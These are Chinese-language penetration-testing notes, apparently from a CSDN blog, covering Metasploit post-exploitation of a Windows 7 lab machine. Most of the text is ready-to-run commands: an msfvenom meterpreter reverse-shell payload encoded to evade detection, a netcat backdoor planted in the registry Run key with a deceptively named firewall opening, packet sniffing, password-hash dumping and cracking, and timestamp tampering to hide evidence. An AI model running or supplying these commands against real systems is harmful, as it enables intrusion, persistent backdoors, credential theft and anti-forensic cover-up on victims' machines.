注册表

  • 注册表保存着 windows 几乎全部配置参数
  • 如果修改不当,可直接造成系统崩溃
  • 修改前完整备份注册表

  • 某些注册表的修改是不可逆的

    常见用途

  • 修改、增加启动项

  • 窃取存储于注册表中的机密信息

  • 绕过文件型病毒查杀

    1. #生成payload
    2. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
    3. cp payload.exe /var/www/html/
    4. service apache2 start
    5. #侦听
    6. service postgresql start
    7. msfconsole
    8. use exploit/multi/handler
    9. set payload windows/meterpreter/reverse_tcp
    10. set LHOST 192.168.1.119
    11. exploit -j
    12. #win7浏览器192.168.1.119/payload.exe,执行后,kali获取shell
    13. #打开session
    14. sessions -i 1
    15. #用注册表添加 nc 后门服务
    16. upload /usr/share/windows-binaries/nc.exe C:\windows\system32
    17. reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
    18. reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
    19. reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
    20. #打开防火墙端口,造成迷惑
    21. execute -f cmd -i -H
    22. C:\Users\w7\Desktop > netsh firewall show opmode #查看状态
    23. C:\Users\w7\Desktop > netsh firewall add portopening TCP 444 test ENABLE ALL #test这里名字最好取的有迷惑性
    24. C:\Users\w7\Desktop > shutdown -r -f -t 0
    25. #获取shell, 每次win7重启就可以
    26. nc 192.168.1.118 444

    原文:https://fishpond.blog.csdn.net/article/details/105858425

    信息收集

    抓包

    1. meterpreter > load sniffer
    2. sniffer_interfaces #查看网卡
    3. sniffer_start 2 #在2号网卡上抓包
    4. #在内存中缓冲区块循环存储抓包(50000包),不写硬盘
    5. sniffer_dump 2 1.cap #把包dump下来
    6. #智能过滤 metepreter 流量,传输全程使用 SSL/TLS 加密

    解包

    1. se auxiliary/sniffer/psnuffle
    2. set PCAPFILE /root/1.cap
    3. 搜索文件
    4. search -f *.ini
    5. search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

    John the Ripper(破解弱口令)

    1. use post/windows/gather/hashdump  # system 权限的 metepreter 
    2. post(hashdump) > run   # 保存在 /tmp/ 目录下 
    3. use auxiliary/analyze/jtr_crack_fast 
    4. run

    擦除痕迹

    1. #查看这三个时间
    2. ls -l --time=atime 1.txt  #Accessed:登录查看时会变
    3. ls -l --time=mtime 1.txt  # Modified:文件做修改时会变
    4. ls -l --time=ctime 1.txt  #Changed:权限修改时会变
    5. stat 1.txt #直接看三个
    6. #修改这三个时间
    7. touch -d "2 days ago" 1.txt #把access和modify时间往前改2天
    8. touch -t 1501010101 1.txt #设置access和modify的“年月日时分”

    MACE:MFT entry

  • MFT:NTFS 文件系统的主文件分配表 Master File Table

  • 通常 1024 字节或2个硬盘扇区,其中存放多项 entry 信息
  • 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
  • 更多信息可研究文件系统取证分析技术

    Timestomp (meterpreter)

    1. timestomp -v 1.txt  #显示详细时间
    2.  timestomp -f c:\\autoexec.bat 1.txt
    3.  -m / -a / -c / -e / -z
    4.  timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt